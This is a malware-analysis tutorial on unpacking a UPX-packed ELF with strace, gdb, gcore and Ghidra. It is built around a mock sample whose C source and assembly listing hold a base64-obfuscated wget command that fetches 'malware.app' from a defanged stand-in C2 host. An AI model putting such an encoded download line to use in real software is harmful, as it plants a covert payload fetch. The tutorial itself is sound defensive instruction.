UPX-b-gone: dynamically unpacking an ELF
intro
When analyzing malicious PE files (Windows executables), you pretty much have to deal with packers at some point. Packers protect the innards of an executable that is otherwise easily identified as malicious through the use of compression or encryption (sometimes called a crypter). When run, the packed executable will then unpack itself in memory and restore all of the former contents, like code and data segments. When dealing with a packed executable it is most often easier to let it unpack itself, than it is to replicate the packing / unpacking routine. The process that contains the unpacked code and strings can then be dumped to disk and analyzed through the use of static analysis tools.
While there are plenty of ressources on how to do this for PE files, there isn’t really the same amount of info available on to do this for ELF files (linux executables). That is why I looked into the necessary steps and tooling and wrote together a little follow-along on this topic.
This post is about manually unpacking a UPX packed ELF binary. Manully as in: dynamic unpacking done by the binary itself and aided by a debugger. Afterwards the process gets dumped to disk for potential further analysis. It also deals with orientation inside the binary and comparing it to the original unpacked version.
A custom sample with a small training wheel is used for this excercise, but there are some thoughts on how to apply this to more real world circumstances under further thoughts. These might help you if you are starting out in this area. The test file (and a lot of knowledge on ELF analysis) was picked up through intezers great blog series on linux malware analysis.
required tooling
I recommend you use remnux for this, as it comes with everything that is needed already installed. You can also use your own linux box, you just have to install the following:
$ sudo apt install gcc strace gdb
Replace with your package manager as needed.
If you want to follow along the static analysis section you also need Ghidra and a jdk/jre. I leave the setup up to you. Alternatively use radare2 with Cutter or IDA (free).
In general I would also recommend setting up GEF for use with GDB, but for this excercise it is not really needed and more of a pointer towards a great addon for GDB.
sample modification
The following code is taken from the 2nd blog post of the intezer ELF malware analysis series. A simple modification to the ping
command was made in order to keep the binary from exiting. This affects functionality and only ping will get executed, but the other strings will still be present in memory. This is also the training wheel that was mentioned in the intro. Because ping will be called indefinately, we don’t have to deal with setting appropriate breakpoints.
#include <stdio.h>
#include <stdlib.h>
char google_dns_ping[50] = "ping 8.8.8.8";
char some_string[100]= "echo d2dldCBodHRwOi8vc29tZW5vbmV4aXRpbmdjbmNbLl1jb20vbWFsd2FyZS5hcHA=|base64 -d | echo";
int ping_google_dns(){
char output[500];
int lines_counter = 0;
char path[1035];
FILE* fp = popen(google_dns_ping,"r");
while (fgets(path, sizeof(path), fp) !=NULL){
lines_counter++;
}
return lines_counter;
}
int main()
{
int length = ping_google_dns();
if (length > 5){
system("apt-get install wget");
system(some_string);
return 1;
}
printf("hello world\n");
return 1;
}
As can be seen from the above code, there are multiple interesting strings in this:
ping 8.8.8.8
echo ...
sequenceapt-get install wget
hello world
These strings will serve as markers and orientation points throughout the analysis.
C compilation process
In the following section I will shortly discuss the C compilation process because the output of the intermediate steps of the compilation process will be used to quickly identify the original code.
The C compilation process goes through the following steps:
- Preprocessor
- Compiler
- Assembler
- Linker
During the preprocessing phase, all macros and imports (#define
and #include
statements) are evaluated and turned into pure C code. This essentially boils down to placing the contents of the imported header files into the file that includes/imports it.
During the compilation phase the C code is translated into assembly code and optimization of the code takes place. This step doesn’t produce machine code but simply translates to assembly (so mnemonics and operands e.g. mov eax, 0x5
). This makes it possible to reuse an assembler program for all compiled languages as long as the compiler generates assembly.
In the next step, the assembler produces machine code from the assembly. All of these steps (preprocessing, compilation, assembling) are executed individually on each of the source files or output files from the previous steps. So if you got a well structured project that consists of multiple source code files, each of the steps produces one output file for each source file.
The assembler produces object files which are relocatable. Relocatable means that there are no assumptions in the code on where to find certain things, which allows a relocatable file to be moved to different places in memory without breaking things. Neither external references like imported functions, or references to functions or symbols from other source code files are known and resolved during this step. That is the job of the linker, which is rearranging the relocatable object files and combining them into a loadable executable.
compiler and assembler
The following compiler commands will generate intermediate results of the compilation process. You can follow along as you go through this but this is not needed for unpacking and simply serves as a comparison to identify the unpacked code.
The **compilation**-only mode of gcc
can be invoked with
$ gcc -S -masm=intel sample.c
$ ls
sample.c
sample.s
The command generates .s
asm files in intel syntax (compare to the less commonly used AT&T syntax). These files are plain text and can be opened with any text editor.
You can see the first lines of the assembly file in the following code block. Note the strings defined as global variables (.globl
) google_dns_ping
and some_string
. Also noteworthy is the start of the function definition for ping_google_dns
. Compare this to the source code above.
.file "sample.c"
.intel_syntax noprefix
.text
.globl google_dns_ping
.data
.align 32
.type google_dns_ping, @object
.size google_dns_ping, 50
google_dns_ping:
.string "ping 8.8.8.8"
.zero 37
.globl some_string
.align 32
.type some_string, @object
.size some_string, 100
some_string:
.string "echo d2dldCBodHRwOi8vc29tZW5vbmV4aXRpbmdjbmNbLl1jb20vbWFsd2FyZS5hcHA=|base64 -d | echo"
.zero 13
.section .rodata
.LC0:
.string "r"
.text
.globl ping_google_dns
.type ping_google_dns, @function
ping_google_dns:
.LFB6:
.cfi_startproc
endbr64
push rbp
[...]
The assembler can be invoked with
$ gcc -c sample.c
$ ls
sample.c
sample.o
This generates object files with .o
extension. Object files are binary files and contain machine code that can be directly executed by a CPU. Due to missing references this won’t work though. External functions and internal references still have to be resolved.
packing the binary
The next step is to compile and pack the program. There will be no special treatment after the file is packed, so it could be decompressed simply by calling upx with option -d
. But this is not always possible. The UPX headers embedded in the binary can be modified so that UPX errors out when called with the decompress option. Also UPX is open source, so adversaries can modify and recompile the project to create a custom packer not compatible with default UPX. For this reason, this article deals with dumping of the process.
UPX has a size requirement of around 40k bytes. So in order to get the sample to an appropriate size, the easiest fix is to compile it statically.
$ gcc -static sample.c
$ ls
a.out
After that it can be packed with Upx. -9
is the option to compress better.
$ upx -9 a.out -o a.upx
UPX compression brought the static binary down from around 885K to 344K bytes.
analysis
strace the binary
strace
can be used to get an overview of what is happening during run time of the binary and which system calls are made.
$ strace -v -s 150 -f -o strace.out ./a.upx
The options above are for verbose output, increasing strings length to 150, following forks and writing the output to a file named strace.out.
Since the program is pinging endlessly you can terminate it after around 3 seconds.
inspecting the trace
When inspecting the strace output you can see the following system calls (among others):
- mmap: creates new mapping in the addr space of the calling process
- mprotect: change access protections of mem page
- arch_prctl architecture specific process/thread control
- brk: can be used like malloc. This use is discouraged by the man pages
In the following image you can see the start of the trace before forking for the execution of the ping
command.
I have color coded the different reoccuring addresses and memory protection settings. I especially want to point your attention to the mprotect
calls in lines 8, 10 12 and 14, which change the protection settings of a memory page. During each of these calls, the PROT_WRITE
page permission was removed. This permission allows to write and change the contents of the memory page. This is necessary for decompressing the UPX packed code and data, by relacing it with its uncompressed counterpart. Afterwards, the PROT_WRITE
permission is removed because it not needed for normal operations of sections like .text
and .rodata
(code and read only data).
Line 9 and 10 are also noteworthy, because here we can see a permission change from rwx
(read, write, execute) to the permission set rx
(read, execute). This hints at this being the .text
section mapping because that is where the executable protection setting is needed. So keep the address 0x401000 in mind for the following analysis.
If strace
and linux system calls are new to you, I recommend also creating a trace of the non packed version of the program. Then you can compare the output with the UPX packed version.
Also you can look up syscalls via man pages through:
$ man 2 <syscall-name>
dumping with gdb
At this point we got all the pieces in place and are ready to dump the binary.
Open the binary in gdb and show the process memory mapping
(gdb) info proc mappings
And dump the memory sections without an objfile entry as well as the heap:
(gdb) dump binary memory dumpgdb0.bin 0x400000 0x401000
(gdb) dump binary memory dumpgdb1.bin 0x401000 0x499000
(gdb) dump binary memory dumpgdb2.bin 0x499000 0x4c6000
(gdb) dump binary memory dumpgdbheap.bin 0x4c6000 0x4f0000
Hint: The last word / consecutive string of characters can be deleted with ctrl + w
in most shells like bash and zsh.
analyzing the dumps
Dumpgdb0.bin contains the ELF header. This can be viewed via a hex editor like xxd
and also through readelf
.
$ readelf -a dumpgdb0.bin
ELF Header:
Magic: 7f 45 4c 46 02 01 01 03 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - GNU
ABI Version: 0
Type: EXEC (Executable file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0x4016c0
Start of program headers: 64 (bytes into file)
Start of section headers: 903288 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 10
[...]
The entry point address shown above is also identical to the entry point of the original, statically compiled and not compressed binary.
Dumpgdb2.bin contains .rodata
, which can be deduced from its contents.
Compare the above to the output of the .rodata
section of a non statically compiled version of the original source code.
Dumpgdbheap.bin was already labeled as the heap in gdb
. It contains the globally defined string variables as well as the current working directory and the current output of the ping command.
analyzing .text the hard way
Heads up: This part deals mostly with locating the disassembled functions inside the dump. So skip this if you are primarily interested in the right way to perform the dump.
Dumpgdb1.bin contained the .text
section and as such the code of the program. When loading the dump file in ghidra the language must be manually selected since the file lacks the header information used to determine this. For the language mode x86-64 LE gcc compiled was chosen, because that is how the sample was compiled.
The file contains a lot of functions since the program was compiled statically. Therefor it is not feasible to reverse this manually.
Instead I tried to locate the two essential functions main
and ping_google_dns
by finding machine code / bytes that match.
The objectdump of the .o
file, that was created during the compilation phase could be used as a point of referece for the ping_google_dns
function. You can generate the disassembly view via objdump -M intel -d sample.o
.
Back to ghidra and the memory dump we can search for the same instruction via Search -> For Instruction Patterns
. An instruction sequence can then be entered in the dialogue window.
At first the following instruction was picked
f: 64 48 8b 04 25 28 00 mov rax,QWORD PTR fs:0x28
16: 00 00
because it was a longer instruction referencing a (segment) register. Other instructions, like call
and lea
, are affected by relocations because they reference absolute or relative memory addresses. This makes them unsuitable as a search criterion when comparing between a relocatable object file and an in memory representation.
The search returned only one match but a closer inspection of the follow up instructions showed that this wasn’t an area were the ping_google_dns
function resided in memory.
A second search was performed for the stack resizing operation sub rsp,0x430
. That turned out to be more unique since it contains the specific value 0x430
which was used to grow the stack in a way that it fits the local variables (path variable).
int ping_google_dns(){
char output[500];
int lines_counter = 0;
char path[1035];
0x430
is 1072 in decimal, which is close to the 1035 + 4 bytes needed for path
and lines_counter
. With some alignment and whatever else, that is close enough for me to 1072.
The output
variable was likely removed through optimization performed by the compiler. The variable wasn’t used in the function and as such redundant.
Due to this the main function and ping_google_dns
could be identified but had to be manually dissassembled since Ghidra did not disassemble them. You can do so by selecting the bytes and pressing D
or right clicking and selecting disassemble.
The image shows the identified main
function. The functions were renamed manually.
Going through this dump did not look like a feasible approach. This was because all references were missing, .rodata
and heap
strings weren’t a part of this dump and there were too many irrelevant functions due to the static compilation.
gcore to the rescue
The far better approach of creating a dump that can be analyzed is through gcore
. gcore
is a utility that creates process dumps in the same way the kernel would create a core dump. But without requiring a process to crash. It is also a part of the gdb project.
Create the dump by determining the pid of the analyzed process and call gcore on the pid:
$ pidof a.upx
12400
$ sudo gcore 12400
The output file contains all readable memory regions and with them heap
as well as .rodata
sections.
Load the gcore dump in Ghidra:
There are three call instructions highlighted on the Listing
pane to the left. As you can see from their arguments, our strings of interest are passed to these calls. On the right side you can see the Defined Strings
pane where the ping 8.8.8.8
string is highlighted.
The below image shows the decompiler view of the ping_google_dns
function with resolved references to the heap location s_ping_8.8.8.8_004c6100
.
Also a big thank you to everyone who posted in this stackoverflow thread for putting so much value in a single location.
further thoughts
third dumping util
As a third way to dump the process, avml and/or volatility might be used. Even though this is a bit of an overkill it doesn’t rely on GDB/gcore.
fourth dumping util (update)
As shown here, the sample can be copied from /proc/PID/mem
with dd
.
To do so, first check out the memory map and afterwards dump the segments.
- check out
/proc/PID/maps
- dump segments with
dd if=mem bs=1 skip=$((0xSTART)) count=$((0xEND-0xSTART)) of=/tmp/out
gcore from gdb
You can call gcore
straight from gdb.
(gdb) gcore gcoredump.bin
Combine this with breaking on syscalls like fork
or munmap
and you got all the tools assembled to start dumping malware.
(gdb) catch syscall fork
(gdb) run
Depending on where the action takes place, you might have to activate follow fork mode (should not be necessary for standard UPX though)
(gdb) set follow-fork-mode child
https://sourceware.org/gdb/onlinedocs/gdb/Forks.html
Furthermore, and as a little gdb refresher, you can script commands to run after hitting a breakpoint with
(gdb) command 1
Type commands for breakpoint(s) 1, one per line.
End with a line saying just "end".
>i r
>i proc map
>end
The above example executes info register
and info process mappings
after hitting a breakpoint.
execute in container
A quick and dirty containerized analysis environment can be setup with the following. Depending on what you analyse, I would still use further isolation mechanisms.
(host)$ docker run -it ubuntu bash
$ apt update -y
$ apt install -y strace curl wget vim gdb
$ exit
(host)$ docker container ls -a
(host)$ docker commit <container_id> stracer
(host)$ docker run -it \
--rm \
--cap-add=SYS_PTRACE \
--network none \
-v $(pwd):/mnt/ \
stracer bash
reads
- this post by akamai I stumbled upon, while putting the finishing touches on this post, deals with packed files with mangled UPX headers. They also look at dumping the file but use radare2 for it. The r2 command is core.dump, which is probably very similar to what gcore does.